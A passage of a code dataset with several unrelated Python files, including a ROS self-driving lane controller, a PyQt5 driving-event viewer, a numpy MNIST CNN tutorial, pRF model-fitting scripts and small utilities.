np.concatenate(mid_road)\n #\n mid_x_road, mid_y_road = nonzero_x[mid_road], nonzero_y[mid_road]\n x_fit_plot = np.linspace(0, h - 1, h)\n if len(mid_x_road) > 0:\n mid_fit = np.polyfit(mid_y_road, mid_x_road, 2)\n mid_fit_plot = mid_fit[0] * x_fit_plot ** 2 + mid_fit[1] * x_fit_plot + mid_fit[2]\n if self.drawImage:\n for i, mid in enumerate(mid_fit_plot):\n cv2.circle(F_img, (int(mid), i), 1, (255, 0, 0), -1)\n # print(len(mid_fit_plot))\n return F_img, mid_fit_plot, KKKK\n\n def BirdEye(self, img):\n h, w = img.shape[:2]\n self.BirdA = [(w // 2 + self.draw_BotCenter, h - self.draw_Bot),\n (w // 2 - self.draw_BotCenter, h - self.draw_Bot),\n (w // 2 - self.draw_TopCenter, self.draw_Top),\n (w // 2 + self.draw_TopCenter, self.draw_Top)]\n src = np.float32(self.BirdA)\n dst = np.float32([[w, h], [0, h], [0, 0], [w, 0]])\n M = cv2.getPerspectiveTransform(src, dst)\n N = cv2.getPerspectiveTransform(dst, src)\n F = cv2.warpPerspective(img, M, (w, h), flags=cv2.INTER_LINEAR)\n return F, M, N\n\n def run(self):\n self.pub_Speed = rospy.Publisher(self.Topic_Speed, Float32, queue_size=10)\n self.pub_Angle = rospy.Publisher(self.Topic_Angle, Float32, queue_size=10)\n self.sub_Image = rospy.Subscriber(self.Topic_Image, CompressedImage, self.get_image)\n rospy.init_node('talker', anonymous=True)\n print_ros(\"Team 500 Let's Go!!!\")\n\n self.On_Play = True\n self.BienBaoClassifier = BienBaoClassifier()\n rospy.spin()\n\n def Core_thread(self):\n while self.On_Play:\n if self.Continue & (not self.frame is None):\n try:\n image__ = self.frame.copy()\n image = self.BirdEye(image__)[0]\n image, pts, K = self.RoadDetect(image)\n if self.On_Play:\n self.Publish_Angle(self.AxisControl(pts, K))\n self.Publish_Speed(self.Speed)\n else:\n self.Publish_Speed(0)\n cv2.imshow('Team500_DUT ETE', image)\n if cv2.waitKey(1) == 27:\n self.On_Play = False\n print_ros('Turn OFF')\n except BaseException as be:\n print_ros('{}'.format(be))\n\n\n def BienBao_thread(self):\n print_ros('Thread_Online')\n self.Continue = False\n self.BienBaoClassifier = BienBaoClassifier()\n self.Continue = True\n while self.On_Play:\n if not self.frame is None:\n try:\n self.Goc = 30\n self.Speed = 50\n self.BienBao_flag, self.BienBao_VT = self.BienBao(self.frame)\n if self.BienBao_flag in [0,1]:\n self.Goc = 45\n self.Speed = 40\n self.Thang_flag = False\n time.sleep(2)\n except BaseException as be:\n print_ros('{}'.format(be))\n # time.sleep(1)\n print_ros('Thread OFF')\n\n def BienBao(self, image):\n image_ = cv2.inRange(cv2.cvtColor(image, cv2.COLOR_BGR2HSV), (0, 150, 100), (255, 255, 255))\n image_ = cv2.erode(image_, None, iterations=1)\n image_ = cv2.dilate(image_, None, iterations=2)\n ret, labels = cv2.connectedComponents(image_)\n B = 2\n for r in range(ret):\n y, x = np.where(labels == r)\n if (x.shape[0] > 200) & (image_[y[0], x[0]] != 0):\n image_cut = image[np.min(y):np.max(y), np.min(x):np.max(x),:]\n h, w = image_cut.shape[:2]\n if (0.8 <= h/w <= 1.2) & (0.8 <= w/h <= 1.2):\n B = self.BienBaoClassifier.detect(image[np.min(y):np.max(y), np.min(x):np.max(x), :])\n if B in [0, 1]:\n print_ros('Result: {}'.format(self.Label_bienbao[B]))\n # if self.drawImage:\n # image = cv2.rectangle(image, (np.min(x), np.min(y)), (np.max(x), np.max(y)), (0, 0, 255), 2)\n # image = cv2.putText(image, self.Label_bienbao[B],(np.min(x), np.min(y)),cv2.FONT_HERSHEY_COMPLEX_SMALL, 0.7, (0, 255, 255))\n # self.First_time = False\n return B, ((np.min(x), np.min(y)), (np.max(x), np.max(y)))\n\n def AxisControl(self, pts, K, top=60, thresh=1):\n # print(pts)\n AxisLine = sp.filters.gaussian_filter1d(pts, 0.5)\n # print(AxisLine)\n if self.BienBao_flag in [0, 1]:\n Control = ((AxisLine[240-top] - 360//2)/180)*self.Goc\n self.Thang_flag = 0\n else:\n if (K < 4) & (self.Thang_flag > 20):\n self.Thang_flag = 0\n Control = self.Control\n else:\n self.Thang_flag += 1\n Control = ((AxisLine[240-top] - 360//2)/180)*self.Goc\n # if self.BienBao_flag in [0, 1] & self.BienBao_delay<=self.BienBao_delay_set:\n # self.BienBao_delay += 1\n # if self.Bien\n # Control = -abs(Control) - 10\n # else:\n # self.BienBao_delay = 0\n # print(Control)\n if Control > thresh:\n Control -= thresh\n Text = \"Turn Right: %d\" % Control\n elif Control < -thresh:\n Control += thresh\n Text = \"Turn Left: %d\" % abs(Control)\n else:\n Control = 0\n Text = \"Go On\"\n self.Control = Control\n print_ros(Text)\n return Control\n\n def get_image(self, data):\n try:\n if self.First_time:\n self.First_time=False\n Thread(target=self.BienBao_thread).start()\n Thread(target=self.Core_thread).start()\n self.Continue = True\n Array_JPG = np.fromstring(data.data, np.uint8)\n cv_image = cv2.imdecode(Array_JPG, cv2.IMREAD_COLOR)\n self.frame = cv_image\n except BaseException as be:\n print_ros('{}'.format(be))\n self.Continue = True\n\n def Publish_Speed(self, speed):\n speed = min(self.limitSpeed[1], speed)\n speed = max(self.limitSpeed[0], speed)\n self.Speed = speed\n self.pub_Speed.publish(float(speed))\n\n def Publish_Angle(self, angle):\n angle = min(self.limitAngle[1], angle)\n angle = max(self.limitAngle[0], angle)\n self.Angle = angle\n self.pub_Angle.publish(float(angle))\n\n\nif __name__ == '__main__':\n Team500_CDS_ROS(NameTeam='team500', drawImage=True)\n","sub_path":"File/team500/scripts/main_team500.py","file_name":"main_team500.py","file_ext":"py","file_size_in_byte":11277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184052045","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport numpy as np\nimport pandas as pd\nimport config_data as c\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom event_thread import EventThread, TaskType\nfrom event_identification import EventType\nimport images\n\n\nclass EventWidget(QtWidgets.QWidget):\n\n setPositionSignal = QtCore.pyqtSignal(float, name='setPositionSignal')\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.tripData = None\n self.resultItems = []\n self.eventThread = EventThread()\n self.eventThread.resultReady.connect(self.ShowEvents)\n self.SetupUI()\n\n def SetupUI(self):\n # table\n self.table = QtWidgets.QTableWidget()\n self.table.setColumnCount(6)\n self.table.setHorizontalHeaderLabels('EventId Type Time Video Chart Para'.split())\n self.table.verticalHeader().setHidden(True)\n header = self.table.horizontalHeader()\n font = header.font()\n font.setBold(True)\n header.setFont(font)\n self.table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)\n\n # other component\n hlayout = QtWidgets.QHBoxLayout()\n self.buttonGroup = QtWidgets.QButtonGroup()\n self.buttonGroup.setExclusive(False)\n self.buttonGroup.buttonToggled[QtWidgets.QAbstractButton, bool].connect(self.CheckBoxClicked)\n # add 'All' button\n self.allbtn = QtWidgets.QCheckBox('All')\n self.allbtn.setChecked(True)\n self.allbtn.clicked.connect(self.AllBtnClicked)\n startBtn = QtWidgets.QCheckBox('Start')\n startBtn.setChecked(True)\n stopbtn = QtWidgets.QCheckBox('Stop')\n stopbtn.setChecked(True)\n # self.buttonGroup.addButton(allbtn)\n self.buttonGroup.addButton(startBtn)\n self.buttonGroup.addButton(stopbtn)\n hlayout.addWidget(self.allbtn)\n hlayout.addWidget(startBtn)\n hlayout.addWidget(stopbtn)\n # add other button for all types\n for i in TaskType:\n if i == TaskType.StartStop:\n continue\n checkBox = QtWidgets.QCheckBox(i.name)\n checkBox.setChecked(True)\n self.buttonGroup.addButton(checkBox)\n hlayout.addWidget(checkBox)\n \n self.configBtn = QtWidgets.QPushButton(QtGui.QIcon(\":/img/configuration\"), 'config')\n self.updateBtn = QtWidgets.QPushButton(QtGui.QIcon(\":/img/updating\"), 'update')\n\n # layout\n hlayout.addWidget(self.configBtn)\n hlayout.addWidget(self.updateBtn)\n\n vlayout = QtWidgets.QVBoxLayout()\n vlayout.addWidget(self.table)\n vlayout.addLayout(hlayout)\n self.setLayout(vlayout)\n\n def UpdateTripData(self, data):\n self.tripData = data\n self.UpdateEvents()\n\n def UpdateEvents(self):\n # start the thread\n if not self.eventThread.isRunning():\n self.eventThread.start()\n # clear the origin contens\n self.table.clearContents()\n self.table.setRowCount(0)\n # prepare for search\n self.resultItems.clear()\n self.searchItems = self.CheckSelectedItem()\n self.recvSet = set()\n\n self.eventThread.AddTasks(self.tripData, self.searchItems)\n\n def CheckSelectedItem(self):\n ''' 从配置文件加载需要检测的事件 '''\n items = []\n allcfg = [c.StartStop, c.HardBrake, c.HardSwerve, c.LaneChange, c.CutIn, c.CarFollowing, c.PhoneEvent, c.FatigueDriving]\n alltype = [TaskType.StartStop, TaskType.HardBrake, TaskType.HardSwerve, TaskType.LaneChange, TaskType.CutIn,\n TaskType.CarFollowing, TaskType.PhoneEvent, TaskType.FatigueDriving]\n for i, val in enumerate(allcfg):\n if val:\n items.append(alltype[i])\n return items\n\n def ShowEvents(self, task: TaskType, items):\n self.recvSet.add(task)\n self.resultItems.extend(items)\n # wait all task returned\n if len(self.recvSet) == len(self.searchItems):\n # exit the thread when all task returned\n self.eventThread.Stop()\n # sorted by timestamp\n self.resultItems.sort(key=lambda x: x[1])\n # show event\n cameraIcon = QtGui.QIcon(':/img/camera-simple')\n chartIcon = QtGui.QIcon(':/img/chart')\n for item in self.resultItems:\n row = self.table.rowCount()\n self.table.insertRow(row)\n\n eventIdItem = QtWidgets.QTableWidgetItem(str(row + 1))\n typeItem = QtWidgets.QTableWidgetItem(item[0].name)\n\n t = item[1] // 10 # to s\n eventTimeStr = \"%.2d:%.2d:%.2d\" % (t // 3600, t % 3600 // 60, t % 3600 % 60)\n timeItem = QtWidgets.QTableWidgetItem(eventTimeStr)\n\n videoBtn = QtWidgets.QPushButton(cameraIcon, 'Video')\n videoBtn.setLayoutDirection(QtCore.Qt.RightToLeft)\n videoBtn.setProperty('timestamp', item[1])\n videoBtn.clicked.connect(self.VideoBtnClicked)\n\n chartBtn = QtWidgets.QPushButton(chartIcon, 'Charts')\n chartBtn.setLayoutDirection(QtCore.Qt.RightToLeft)\n chartBtn.setProperty('timestamp', item[1])\n chartBtn.clicked.connect(self.ChartsBtnClicked)\n\n self.table.setItem(row, 0, eventIdItem)\n self.table.setItem(row, 1, typeItem)\n self.table.setItem(row, 2, timeItem)\n self.table.setCellWidget(row, 3, videoBtn)\n self.table.setCellWidget(row, 4, chartBtn)\n\n # QtWidgets.QApplication.processEvents()\n\n def VideoBtnClicked(self):\n obj = self.sender()\n timestamp = obj.property('timestamp')\n self.setPositionSignal.emit(timestamp)\n\n def ChartsBtnClicked(self):\n obj = self.sender()\n timestamp = obj.property('timestamp')\n print(timestamp)\n \n def CheckBoxClicked(self, btn, checked):\n items = self.table.findItems(btn.text(), QtCore.Qt.MatchContains)\n for item in items:\n self.table.setRowHidden(item.row(), not checked)\n if not checked:\n self.allbtn.setChecked(False)\n\n def AllBtnClicked(self, checked):\n for btn in self.buttonGroup.buttons():\n btn.setChecked(checked)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n tripData = pd.read_csv('D:\\\\TongJi\\\\NatureDriving\\\\data\\\\359932\\\\File_ID_359932.csv', encoding='utf-8')\n\n # data handle : fill and transform\n\n fieldList = [c.SpeedField, c.AccelXField, c.AccelYField, c.AccelZField,\n c.LaneWidthField, c.LaneOffsetField, c.LeftLaneField, c.RightLaneField,\n c.T0_ObjectID, c.T0_XRange, c.T0_YRange,\n c.T0_ObjectID.replace('0', '1'), c.T0_XRange.replace('0', '1'), c.T0_YRange.replace('0', '1'),\n c.T0_ObjectID.replace('0', '2'), c.T0_XRange.replace('0', '2'), c.T0_YRange.replace('0', '2'),\n c.T0_ObjectID.replace('0', '3'), c.T0_XRange.replace('0', '3'), c.T0_YRange.replace('0', '3')]\n tripData[fieldList] = tripData[fieldList].fillna(method='pad')\n tripData[fieldList] = tripData[fieldList].fillna(0)\n tripData[c.SpeedField] = tripData[c.SpeedField] * 3.6\n mm2mList = [c.LaneWidthField, c.LaneOffsetField, c.LeftLaneField, c.RightLaneField]\n tripData[mm2mList] = tripData[mm2mList] / 1000\n\n win = EventWidget()\n win.UpdateTripData(tripData)\n win.resize(800, 800)\n win.show()\n\n sys.exit(app.exec())\n","sub_path":"event_widget.py","file_name":"event_widget.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547336187","text":"import mnist\nimport numpy as np\n'''\n卷积神经网络里的卷积在计算机视觉里是“相关”操作\n填充是为了输入和输出有相同的尺寸\n如果不进行填充(padding)操作,就是称为“有效”填充\nMINIST CNN\n每张图像是28*28,使用3*3的过滤器,一共8个过滤器,输出26*26*8\n'''\n\n\nclass Conv3x3:\n # A Convolution layer using 3x3 filters\n def __init__(self, num_filters):\n self.num_filters = num_filters\n # filters is a 3d array with dimensions (num_filters ,3, 3)\n # we divide by 9 to reduce the variance of our initial values\n self.filters = np.random.rand(num_filters, 3, 3) / 9\n\n def iterate_regions(self, image: np.ndarray):\n '''\n Generates all possible 3x3 image regions using valid padding\n image is a 2d numpy array\n :param image:\n :return:\n '''\n h, w = image.shape # minist 28*28\n for i in range(h-2):\n for j in range(w-2):\n im_region = image[i:(i + 3), j:(j + 3)]\n yield im_region, i, j\n # 返回图像上的一个3*3的区域和它最左上的坐标\n\n def forward(self, input: np.ndarray):\n '''\n performs a forward pass of the conv layer using the given input\n return a 3d numpy array with dimensions (h, w, num_filters)\n input is a 2d numpy array\n :param input:\n :return:\n '''\n h, w = input.shape # 28*28\n\n # 把output想象成一个二维数组,每一个元素是维度为self.num_filters的向量。\n output = np.zeros((h-2, w-2, self.num_filters)) #26*26*8,因为过滤器是8*3*3\n\n # im_region一个包含相关图像区域的3x3阵列\n # self.filter 一个3d数组 8*3*3\n # im_region * self.filters 使用广播功能\n for im_region, i, j in self.iterate_regions(input):\n # self.filters is a 3d array with 8 x 3 x 3\n # im_region multi every 3x3 array in self.filters\n output[i, j] = np.sum(im_region * self.filters, axis=(1, 2))\n\n return output\n'''\n图像中相邻的像素倾向具有相似的值。\n池化层,减少通过猜测在输入中产生的汇总值。简单的max或average等这些操作。\n在开始的conv layer 之后放置一个池大小为2的max pooling 把 26*26*8 变成 13*13*8\n'''\n\n\nclass MaxPool2:\n # A max pooling layer using a pool size of 2\n def iterate_region(self, image: np.ndarray):\n '''\n Generate non-ovrlapping 2x2 image regions to pool over\n image is a 3d numpy array\n :param image:\n :return:\n '''\n h, w, _ = image.shape\n new_h, new_w = h // 2, w // 2\n\n for i in range(new_h):\n for j in range(new_w):\n image_region = image[(i*2):(i*2+2), (j*2):(j*2+2)]\n yield image_region, i, j\n\n def forward(self, input: np.ndarray):\n '''\n :param input: a 3d array with dimensions (h, w, num_filters)\n :return: a 3d array with dimensions (h/2, w/2, num_filters)\n '''\n h, w, num_filters = input.shape # 来自卷积层的输出26*26*8\n output = np.zeros((h//2, w//2, num_filters))\n\n for image_region, i, j in self.iterate_region(input):\n output[i, j] = np.max(image_region, axis=(0, 1))\n\n return output\n\n\nclass Softmax:\n '''\n 将任意实际值转换为概率,\n 13*13*8 --> (0, 9)\n 帮我们量化对预测的确定程度\n '''\n # A standard fully-connected layer with softmax activation\n def __init__(self, input_len, nodes):\n self.weights = np.random.randn(input_len, nodes) / input_len\n self.biases = np.zeros(nodes)\n\n def forward(self, input: np.ndarray):\n '''\n\n :param input: any array with any dimensions\n :return: a 1d numpy array containing the respective probability values\n '''\n input = input.flatten()\n\n input_len, nodes = self.weights.shape\n\n totals = np.dot(input, self.weights) + self.biases\n exp = np.exp(totals)\n return exp / np.sum(exp, axis=0)\n\n\ntrain_images = mnist.train_images()\ntrain_labels = mnist.train_labels()\ntest_images = mnist.test_images()[:1000]\ntest_labels = mnist.test_labels()[:1000]\n\nprint(test_images[0].shape)\n\nconv = Conv3x3(8) # 28*28*1 -> 26*26*8\npool = MaxPool2() # 26*26*8 -> 13*13*8\nsoftmax = Softmax(13 * 13 * 8, 10) # 13*13*8 -> 10\n\n'''\noutput = conv.forward(train_images[0])\nprint(output.shape)\noutput = pool.forward(output)\nprint(output.shape)\n'''\n\n\ndef forward(image: np.ndarray, label):\n # we transform the image from [0, 255] to [-0.5, 0.5] to make it easier\n # to work with, this is standard practice\n out = conv.forward((image / 255) - 0.5)\n out = pool.forward(out)\n out = softmax.forward(out)\n\n # Calculate cross-entropy loss and accuracy\n loss = np.log(out[label])\n acc = 1 if np.argmax(out) == label else 0\n\n return out, loss, acc\n\n\nprint('MNIST CNN initialized')\n\n\nloss, num_correct = 0, 0\nfor i, (im, label) in enumerate(zip(test_images, test_labels)):\n _, l, acc = forward(im, label)\n loss += 1\n num_correct += acc\n\n if i % 100 == 99:\n print(\n '[Step %d] Past 100 steps: Average Loss %.3f | Accuracy: %d%%' %\n (i + 1, loss / 100, num_correct)\n )\n loss = 0\n num_correct = 0\n","sub_path":"DL/NeuralNetwork/ConvNeuralNetwork.py","file_name":"ConvNeuralNetwork.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"613636815","text":"import sys\nimport math\nimport collections\n\n\nlast = 100\n\n\ndef main(k=2):\n distribution = collections.defaultdict(int)\n\n for i in range(1, last + 1):\n power_of_k = k**i\n first_digit = get_first_digit(power_of_k)\n distribution[first_digit] += 1\n \n print(\"{0:3}th power of {1} is: {2}, first digit is: {3}\".format(\n i,\n k,\n power_of_k,\n first_digit))\n\n print(end=\"\\n\\n\")\n\n show_distribution(distribution)\n\n\ndef get_first_digit(x):\n while x >= 10:\n x //= 10\n return x\n\n\ndef show_distribution(distribution):\n for i in range(1, 10):\n print(\"Digit {0} has frequency of {1}.\".format(\n i, distribution[i]))\n\n\nmain() if len(sys.argv) <= 1 else main(int(sys.argv[1]))","sub_path":"powersof2.py","file_name":"powersof2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"47249298","text":"##### Run this like: #####\n##### python plotHistogram.py #######\n\nimport os, sys, re, time, getopt, glob, array\nfrom copy import copy, deepcopy\nfrom ROOT import *\nsys.path.insert(0, '/home/arka/arka/include')\nsys.path.insert(0, '/mnt/droplet/home/arka/arka/include')\nfrom Functions import * \n\ndef main():\n directory='plotBeta'\n if not os.path.exists(directory):\n os.makedirs(directory)\n rootFileName = sys.argv[1]\n allRootFileList = sys.argv[2]\n fileRoot = TFile(rootFileName, \"UPDATE\")\n \n with open(allRootFileList) as inputRootFileName:\n for line in inputRootFileName.readlines():\n if '.root' not in line: continue\n massValue = line.split('Mass')\n mass = massValue[1].split('.')[0]\n nameOfFile = line.rstrip()\n fileInput = TFile(nameOfFile, 'READ')\n NTDeff = fileInput.Get('NTDeffEz_Beta_eff')\n \n ### Draw 1D histograms\n drawLine = False\n logY = False\n leftLegend = False\n doAtlas = False\n\n file1D = [NTDeff]; legName = ['']; colorPlot = [4]\n actualMass = mass.split('_')[1]\n DrawHists(file1D, legName, colorPlot, '#beta', 'Efficiency', 0.0, 1.0, 0.0, 0.4, directory+'/NTDeffMass'+mass, 0, 0, drawLine, logY, 'Particle mass: '+actualMass+' GeV', 'NTD efficiency', '', leftLegend, doAtlas)\n \n fileRoot.cd()\n NTDeff.Write('NTDeffMass'+mass)\n fileRoot.Write()\n fileInput.Close()\n \n \n fileRoot.Close()\n \n \n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"plotBeta.py","file_name":"plotBeta.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553843282","text":"A={}\nB={}\nC={}\nl=[]\nseq=[]\nfrom Bio import SeqIO\nfor record in SeqIO.parse('BSRD.fasta', 'fasta'):\n A[record.description]=record.seq \n if len(record.seq) >= 30 and len(record.seq)<=530: # filtering based on length\n l.append(record)\n B[record.description]=record.seq\n else:\n C[record.description]=record.seq\n \n \nwith open('filtered_BSRD.fasta', 'w') as f:\n [f.write('>{0},len={1}\\n{2}\\n'.format(key,len(value),value)) for key,value in B.items()]\n \nwith open('unfiltered_bsrd.txt', 'w') as f:\n [f.write('>{0},len={1}\\n{2}\\n'.format(key,len(value),value)) for key, value in C.items()]\n\noutput_handle = open(\"long_seqs.fasta\", \"w\") \nSeqIO.write(l, output_handle, \"fasta\") # SEQIO way of writing an output file\n\n\n#### This code is for filtering the fasta file based on the length. #######\n","sub_path":"Fasta_length_fileter.py","file_name":"Fasta_length_fileter.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259381934","text":"from math import ceil\r\n\r\nclass PrimeIterator:\r\n def __init__(self, high):\r\n self.high = high\r\n self.number = 1\r\n\r\n def __iter__(self):\r\n return self\r\n\r\n def is_prime(self, number):\r\n if number == 2 or number == 3:\r\n return True\r\n for n in range(2, ceil(number * 0.5)):\r\n if number % n == 0:\r\n return False\r\n return True\r\n\r\n def __next__(self):\r\n while self.number < self.high:\r\n self.number += 1\r\n if self.is_prime(self.number):\r\n return self.number\r\n raise StopIteration\r\n\r\n\r\nhigh = int(input('Input the upper bound:\\n>'))\r\niterator = PrimeIterator(high)\r\nprint(*[i for i in iterator])\r\n","sub_path":"iter_prime.py","file_name":"iter_prime.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296977029","text":"# Exercise 07\n\nimport math\n\nnum = int(input(\"Type a new number: \"))\n\ndouble = num * 2\ntriple = num * 3\nsquare = math.sqrt(num)\n\nprint(f\"The number {num} double is {double}, it's triple is {triple}, and it's square root is {square}\")","sub_path":"ex_007.py","file_name":"ex_007.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547891405","text":"from popeye.visual_stimulus import VisualStimulus\nfrom popeye import og, dog\nimport popeye.utilities as utils\nimport numpy as np\nimport os.path as op\nfrom scipy import signal\nimport ctypes\nfrom popeye.visual_stimulus import VisualStimulus, simulate_bar_stimulus\n\nderivatives = '/data/odc/derivatives'\n\nv = np.load('/data/odc/zooi/tr_prf.npy')\ndata = np.mean(v, 0)\ndata = data[:, (data != 0).all(0)]\n\ndm = np.load(op.join(derivatives, 'prf/dm.npy'))\ndm = signal.resample(dm, 318, axis=-1)\n\nviewing_distance=15\nscreen_width=6\nTR=2.7\nn_pixels=50\n\nsweeps = np.array([-1,45,135,-1,225,315,-1]) # in degrees, -1 is blank\n#stimulus = VisualStimulus(stim_arr=dm,\n #viewing_distance=viewing_distance,\n #screen_width=screen_width,\n #scale_factor=1,\n #tr_length=1.0,\n #dtype=np.short)\nbar = simulate_bar_stimulus(100, 100, 40, 40, sweeps, 30, 30, 20, 0.67)\nstimulus = VisualStimulus(bar, 50, 25, 0.50, 1.0, ctypes.c_int16)\n\nmodel= og.GaussianModel(stimulus, utils.double_gamma_hrf)\nmodel.hrf_delay = 0\n\npars = dict(np.load('/data/odc/derivatives/voxel_prf/modelfree/sub-tr_desc-None_prf_pars.npz'))\n\nx = np.cos(pars['angle']) * pars['ecc']\ny = np.cos(pars['angle']) * pars['ecc']\n\n\n### FIT\n## define search grids\n# these define min and max of the edge of the initial brute-force search. \nx_grid = (-10,10)\ny_grid = (-10,10)\ns_grid = (1/stimulus.ppd + 0.25,5.25)\nh_grid = (-1.0,1.0)\n\n## define search bounds\n# these define the boundaries of the final gradient-descent search.\nx_bound = (-12.0,12.0)\ny_bound = (-12.0,12.0)\ns_bound = (1/stimulus.ppd, 12.0) # smallest sigma is a pixel\nb_bound = (1e-8,None)\nu_bound = (None,None)\nh_bound = (-3.0,3.0)\n\n \n## package the grids and bounds\ngrids = (x_grid, y_grid, s_grid)\nbounds = (x_bound, y_bound, s_bound, h_bound, b_bound, u_bound,)\n# fit\n#fit = dog.DifferenceOfGaussiansFit(model, data, grids, bounds, Ns=5,\n #voxel_index=(1,2,3), auto_fit=True, verbose=1) \n# fit\nfit = og.GaussianFit(model, data[:, 0], grids, bounds, Ns=4,\n voxel_index=(1,2,3), auto_fit=True, verbose=0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport ctypes, multiprocessing\nimport numpy as np\nimport sharedmem\nimport popeye.og_hrf as og\nimport popeye.utilities as utils\nfrom popeye.visual_stimulus import VisualStimulus, simulate_bar_stimulus\n\n# seed random number generator so we get the same answers ...\nnp.random.seed(2764932)\n\n### STIMULUS\n## create sweeping bar stimulus\nsweeps = np.array([-1,0,90,180,270,-1]) # in degrees, -1 is blank\nbar = simulate_bar_stimulus(100, 100, 40, 20, sweeps, 30, 30, 10)\n\n## create an instance of the Stimulus class\nstimulus = VisualStimulus(bar, 50, 25, 0.50, 1.0, ctypes.c_int16)\n\n### MODEL\n## initialize the gaussian model\nmodel = og.GaussianModel(stimulus, utils.double_gamma_hrf)\n\n## generate a random pRF estimate\nx = -5.24\ny = 2.58\nsigma = 1.24\nhrf_delay = -0.25\nbeta = 0.55\nbaseline = -0.88\n\n## create the time-series for the invented pRF estimate\ndata = model.generate_prediction(x, y, sigma, hrf_delay, beta, baseline)\n\n## add in some noise\ndata += np.random.uniform(-data.max()/10,data.max()/10,len(data))\n\n### FIT\n## define search grids\n# these define min and max of the edge of the initial brute-force search. \nx_grid = (-10,10)\ny_grid = (-10,10)\ns_grid = (1/stimulus.ppd + 0.25,5.25)\nh_grid = (-1.0,1.0)\n\n## define search bounds\n# these define the boundaries of the final gradient-descent search.\nx_bound = (-12.0,12.0)\ny_bound = (-12.0,12.0)\ns_bound = (1/stimulus.ppd, 12.0) # smallest sigma is a pixel\nb_bound = (1e-8,None)\nu_bound = (None,None)\nh_bound = (-3.0,3.0)\n\n## package the grids and bounds\ngrids = (x_grid, y_grid, s_grid, h_grid)\nbounds = (x_bound, y_bound, s_bound, h_bound, b_bound, u_bound,)\n\n## fit the response\n# auto_fit = True fits the model on assignment\n# verbose = 0 is silent\n# verbose = 1 is a single print\n# verbose = 2 is very verbose\nfit = og.GaussianFit(model, data, grids, bounds, Ns=3,\n voxel_index=(1,2,3), auto_fit=True,verbose=1)\n\n## plot the results\nimport matplotlib.pyplot as plt\nplt.plot(fit.prediction,c='r',lw=3,label='model',zorder=1)\nplt.scatter(range(len(fit.data)),fit.data,s=30,c='k',label='data',zorder=2)\nplt.xticks(fontsize=16)\nplt.yticks(fontsize=16)\nplt.xlabel('Time',fontsize=18)\nplt.ylabel('Amplitude',fontsize=18)\nplt.xlim(0,len(fit.data))\nplt.legend(loc=0)\n\n## multiprocess 3 voxels\ndata = [data,data,data]\nindices = ([1,2,3],[4,6,5],[7,8,9])\nbundle = utils.multiprocess_bundle(og.GaussianFit, model, data, \n grids, bounds, indices, \n auto_fit=True, verbose=1, Ns=3)\n","sub_path":"analysis/prf/optimize_prfs.py","file_name":"optimize_prfs.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"516451654","text":"#from tensorflow import keras\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D\nfrom tensorflow.keras.layers import Dense, Activation, Dropout, Flatten\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential\n\nimg_width = 150\nimg_height = 150\n\n\n\ndef load_model(MODEL_2):\n\tmodel =Sequential()\n\n\tmodel.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n\tmodel.add(Conv2D(32,(3,3), input_shape=(img_width, img_height, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n\tmodel.add(Conv2D(64,(3,3), input_shape=(img_width, img_height, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(64))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(1))\n\tmodel.add(Activation('sigmoid'))\n\tmodel.load_weights(MODEL_2)\n\treturn model\n\n","sub_path":"predict/img_model.py","file_name":"img_model.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382277269","text":"# import nessary\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport glob\nimport os\nimport math\nfrom tqdm import tqdm\n\n\n__author__ = 'cristian'\n\n\ndef preprocess_image(image):\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize_images(image, [160, 160])\n image /= 255.0 # normalize to [0, 1] range\n\n return image\n\n\ndef load_and_preprocess_image(path_to_image):\n image = tf.read_file(path_to_image)\n\n return preprocess_image(image)\n\n\ndef get_employee(path_employee):\n \"\"\"\n return dict{id: name}\n \"\"\"\n data_frame = pd.read_excel(path_employee)\n rows, columns = data_frame.shape\n # data_frame contains two columns: x_emp_code, name\n # get data by row correspond employee code and name\n dict_code_name = {data_frame.iloc[i]['x_emp_code']: data_frame.iloc[i]['name'] for i in range(rows)}\n\n return dict_code_name\n\n\ndef get_employee_code(path_to_dataset, path_employee):\n \"\"\"\n\n 